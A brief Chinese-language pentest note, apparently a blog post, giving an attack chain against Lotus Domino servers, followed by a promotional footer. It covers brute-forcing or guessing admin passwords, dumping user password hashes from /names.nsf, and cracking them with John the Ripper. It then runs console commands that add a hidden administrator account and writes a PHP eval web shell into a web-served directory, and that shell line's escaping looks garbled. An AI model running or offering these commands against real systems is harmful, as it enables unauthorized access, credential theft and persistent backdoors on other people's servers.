BURP抓包,暴力破解弱口令账户或者尝试admin/password 登录弱口令账户以后,访问 /names.nsf  /webadmin.nsf /admin4.nsf 读取所有用户HASH与NSF文件 读取HASH地址为:/names.nsf/$users?OpenView&Start=1&count=292   保存格式为 用户名:hash (不包含括号) 使用kali里面的john 破解hash    john hash文件 --format=lotus5  或者 john hash文件 --format=dominosec   命令执行   使用管理员权限用户访问/webadmin.nsf记住文件目录位置,然后访问 Quick console    输入load cmd /c net user wooyun$ Wooyun@2016 /add > D:\lotus_xlgg\Domino\Data\domino\html\download\filesets\netuser1.txt   load cmd /c net localgroup administrators wooyun$ /add > D:\lotus_xlgg\Domino\Data\domino\html\download\filesets\netuser1.txt   http://网站/download/filesets/ipconfig.txt   写shell   load cmd /c echo ^<?php @eval($_POST['pass']);? ^ > > D:\Lotus\Domino\data\domino\html\download\filesets\netuser1.php

 

 

SRE实战 互联网时代守护先锋,助力企业售后服务体系运筹帷幄!一键直达领取阿里云限量特价优惠。   Domino 渗透相关 随笔 第1张       Domino 渗透相关 随笔 第2张    
扫码关注我们
微信号:SRE实战
拒绝背锅 运筹帷幄